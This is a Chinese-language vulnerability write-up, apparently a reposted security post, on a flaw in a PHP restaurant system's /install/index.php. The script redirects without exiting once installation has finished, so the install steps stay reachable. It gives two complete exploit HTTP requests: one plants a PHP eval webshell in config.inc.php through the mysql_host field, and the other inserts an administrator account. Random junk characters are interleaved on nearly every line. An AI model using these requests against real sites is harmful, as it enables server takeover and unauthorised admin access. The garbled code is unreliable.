问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。9 n+ j( a# D- C0 ?6 \
* V* O2 V; u" N g+ ^; u+ q6 h<?php) `1 b/ r2 W. M+ T/ N7 {( C
if(file_exists("../install.lock"))8 \9 R( P+ M& T. `6 a
{
: N1 `( ^) a: N& s header("Location: ../");//没有退出2 Y' u, a6 y& h3 E
}
, q) U. w$ d9 W3 z 0 E: Z7 Z" J$ o
//echo 'tst';exit;+ `* N- f" q+ |
require_once("init.php");& E) z# G+ ?" A" `
if(empty($_REQUEST['step']) || $_REQUEST['step']==1); D9 h3 }; K. g8 F' r o0 Y
{# t7 M% n9 n3 V9 u( r
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
2 x7 m/ b# l" `& r! }: J' [, B5 H& t3 r
1、getshell(很危险)
" T" X# m2 ^ s9 }: f" c$ `! Rif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
4 Y) R% a# G, r: ]) F+ t' `1 a" [{7 z2 k' d6 V( J2 J9 G1 F
$smarty->assign("step",1);- ?0 l* R+ L7 l
$smarty->display("index.html");& }0 L. M$ C1 z# B0 F2 h
}elseif($_REQUEST['step']==2)7 m2 M" s; o4 z( y+ ]
{ `, u [4 a' h5 T: `
$mysql_host=trim($_POST['mysql_host']);7 A' [' _- V' S
$mysql_user=trim($_POST['mysql_user']);
6 W6 j; R i6 @# {% D6 g $mysql_pwd=trim($_POST['mysql_pwd']);+ N9 x) d5 j) O+ K
$mysql_db=trim($_POST['mysql_db']);$ U4 _& u% ?; ~6 c \; H
$tblpre=trim($_POST['tblpre']);
) U" [4 N& h" N( j, ^7 q. G $domain==trim($_POST['domain']);4 H9 n5 @/ ~* T" a4 e& [ Y
$str="<?php \r\n";
$ R. |+ ?* Q3 F, B; b $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";7 n" Z! I3 g" a; Q7 a, T
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";! U: \- L2 g3 M- ^" h5 X" f( L
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
4 s* S: K+ S, H) N" q $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";5 M/ D4 {- m4 J$ l. x' V; H7 V
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
) ], K! G4 G2 q# }! @" q $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";0 J: _. J [: B5 X( S3 F
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
% |: E5 u- J7 }/ {1 y4 S: u $str.='define("SKINS","default");'."\r\n";. f1 `+ _, E, f8 _. N" U
$str.='?>';
) \9 q/ F V! b file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件! f9 p4 s* k, a% B1 ]# H, Z
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
! i1 W/ \* O# L) D# i& B/ O- Q$ RPOST /canting/install/index.php?m=index&step=2 HTTP/1.18 v$ V) Y) k% o0 I1 l" P5 _" z
Host: 192.168.80.129
6 R8 w: M# V* I5 WUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.01 `) E1 C& i% L3 w+ L. d( Q' F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
4 p) v( Q5 `6 t' P* t3 ~Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
8 g \7 B6 A6 `6 P6 R% S- d8 m7 jAccept-Encoding: gzip, deflate
9 n3 F7 }/ y n+ L. h. SReferer: http://192.168.80.129/canting/install/index.php?step=1. L( d) @ N, J q) @5 F
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
4 Z! j P9 T2 a4 `' Y' F* \Content-Type: application/x-www-form-urlencoded; w# t* h5 U/ ?7 ~
Content-Length: 126
3 S: E! Z) C8 h( ]; A
( o, q* a& [ @1 e# amysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD% G2 c9 t) b7 y. f
但是这个方法很危险,将导致网站无法运行。/ r3 V3 z, r$ S
d7 o3 {; u! b$ l' R$ e2、直接添加管理员
- B) j F7 q/ j" f' T5 ~: i' }8 r2 ~
elseif($_REQUEST['step']==5)
) z% }0 E2 C! a! F1 P: x{
8 z% P5 U3 e. D" \# [9 e if($_POST)
' o, P- h' q! B+ o& c# P4 W* A { require_once("../config/config.inc.php");6 Q, l. w1 x7 W! h$ r- V0 F
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);% u1 K" c% l" w/ h* s% `
mysql_select_db(MYSQL_DB,$link);1 m8 d$ S+ V. _0 o9 v! |. R/ A( }' l
mysql_query("SET NAMES ".MYSQL_CHARSET );
5 Q% F: r1 `6 }9 p8 r mysql_query("SET sql_mode=''");
, z* e$ X+ L9 Q9 F+ M$ g5 d2 _# u2 ^. W: ?0 X7 r: b Z. `
$adminname=trim($_POST['adminname']);
* {2 F# e6 H; p0 Q- V+ r $pwd1=trim($_POST['pwd1']);: a) j$ C) `% ?& q" o% c1 h- ]9 w
$pwd2=trim($_POST['pwd2']);
* X" f* d* j- P if(empty($adminname))
8 u7 z5 a# Y4 D4 _' P3 \$ p { f" ~0 y6 v" F; L1 ^8 ~( A! Z
1 Z! [4 `/ v% L' W; w: |' @
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
( K2 W- h$ v/ M! Q! v0 R* g exit();
r- i& x8 A+ O( L, ] }3 A; I F" F7 f" Y5 {( O
if(($pwd1!=$pwd2) or empty($pwd1))* X+ \) x, L, e- J% v# A
{
0 ^' o' R) R; [6 N echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出9 ~& D3 ^7 o5 Y
}% [; ~4 k4 a6 R, R2 y
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员* z$ \) |& J6 K7 K7 R+ q3 K) [
}5 ?. g3 e4 [% P$ V2 @
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
2 |9 q8 g0 b& {0 R% K' J K7 yPOST /canting/install/index.php?m=index&step=5 HTTP/1.18 _( V0 T' E/ D' f0 v- h7 }* S( U
Host: 192.168.80.129% M2 Q) h- N9 ~% r+ K
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
6 j4 \6 _. B; w, }9 L; M) iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
8 X1 g5 @1 j0 R% G4 P$ K; v! ]1 y zAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.31 M1 x: Y! H" L* a/ n
Accept-Encoding: gzip, deflate; \( c u* s2 w' l
Referer: http://www.2cto.com /canting/install/index.php?step=1# \4 n J& y7 D% ]/ m
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc428 g/ x9 m% p" i0 o7 ?6 R6 [' M# }
Content-Type: application/x-www-form-urlencoded
% Y1 N. ]) |1 K# w- ^" r- FContent-Length: 46. a( Z2 |5 x5 I$ Z! k0 c
9 C0 b7 z' k) @adminname=qingshen&pwd1=qingshen&pwd2=qingshen
) o5 }8 U5 q9 y0 H9 G9 ? |